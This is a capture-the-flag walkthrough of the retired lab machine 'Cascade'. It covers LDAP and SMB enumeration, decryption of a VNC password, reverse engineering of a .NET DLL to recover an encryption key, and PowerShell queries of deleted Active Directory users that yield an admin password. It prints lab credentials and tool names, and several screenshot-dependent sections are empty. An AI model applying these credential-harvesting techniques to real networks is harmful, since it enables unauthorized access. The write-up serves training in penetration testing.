Synopsis:
Howdy People, This is a walkthrough of retried machine Cascade. The box features:
1. LDAP Enumeration.
2. SMB Enumeration.
3. Reverse Engineering.
4. Querying the Deleted AD users.
Scripts/Tools Used:
1. nmap: https://nmap.org/download.html
2. evil-wirm: gem install evil-winrm
3. smbclient: https://pkgs.org/download/smbclient
4. enum4linux: https://github.com/CiscoCXSecurity/enum4linux
5. cutter: https://cutter.re/download/
6. JustDecompile: https://www.telerik.com/download-trial-file/v2/justdecompile
7. dotnetfiddle: https://dotnetfiddle.net
8. VNC passdecrypter: https://github.com/trinitronx/vncpasswd.py
8. VNC passdecrypter: https://github.com/trinitronx/vncpasswd.py
1.Portscan:
The portscan result shows AD ports are open:
2.USER
I started my enumeration with enum4linux and found a list of users but two of them belongs to a "Remote Management Users" group. That means we can take shell through them.
2.1 Initial Foothold:
As the LDAP port is open, I tried to enumerate LDAP service manually with python and found the base64 encoded password of "r.thomson". Follow this link to know more about LDAP enumeration.
on decoding I get the password :
rY4n5eva.
2.2 SMB Enumeration:
Next, I looked into the shares of "r.thomson" and found a note and hex password of another user "s.smth". The note is a hint that will help us later.
1. /Data/IT/Email Archives/Meeting_Notes_June_2018.html
2. /Data/IT/temp/s.smith/VNC Install.reg
3. /Data/IT/logs/'Ark AD Recycle Bin'/ArkAdRecycleBin.log
Meeting Note:
ArkAdRecycleBin.log:
From this, I concluded arksvc can perform operations like deleting users.
VNC Install.reg:
The hex password:
To decrypt the hex, I used the python script available on Github.
2.3 User.txt
I got the password of s.smith and s.smith is also belongs to the "Remote Management Users" group. So I tried to take shell with evil-winrm.
3. ROOT
3.1 SMB Enumeration:
Looking into the shares of s.smith, I found some interesting files :
1. /Audit$/CascAudit.exe
2. /Audit$/CascCrypto.dll
3. /Audfit$/DB/Audit.db
Checking the file type of Audit.db with file command. It shows it is an SQLite 3.X Database. Next, I connected this database file sqlite3 library of python and tried to gather juicy information.
OR The Other Way
On simply "strings Audit.db" gives the encrypted password of arksvc user.
strings Audit.db
3.2 Reverse Engineering:
Debugging "CascAudit.exe" with the tool cutter, I found the key.
Key: c4scadek3y654321
Next with justDecompile.exe on "CascCrypto.dll", I found the EncryptString and DecryptString function.
I passed the key and encrypted password to DecrypString function. This gave me the password of Arksvc.
the password of arksvc:
w3lc0meFr31nd
3.2 Root.txt
Remember the note, I found from smb shares of r.thomson. The note clarifies two things:
1. The password of TempAdmin is similar to normal Admin.
2. The account of TempAdmin is deleted.
Also, Arksvc can perform operations like deleting or querying AD users.
So, I google this and found an article to list the deleted AD accounts.
Get-ADObject -IncludeDeletedObjects -Filter {objectClass -eq “user” -and IsDeleted -eq $True}
Get-ADObject -Filter {displayName -eq "TempAdmin"} -IncludeDeletedObjects -property *
Simply decode the base64 password to get the plaintext password.
Password:
baCT3r1aN00dles
rooted:)
Thanks for reading.
References:
1. AD Deleted Users: https://blog.stealthbits.com/active-directory-object-recovery-recycle-bin/
Comments
Post a Comment